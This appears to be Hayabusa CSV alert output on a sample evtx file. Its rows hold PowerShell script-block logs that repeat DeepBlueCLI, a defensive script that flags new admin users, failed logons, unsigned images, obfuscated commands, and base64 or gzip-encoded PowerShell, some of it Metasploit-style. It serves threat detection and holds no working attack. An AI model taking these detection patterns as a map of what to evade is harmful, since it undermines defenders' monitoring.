$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match 
""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. 
This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.474 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content 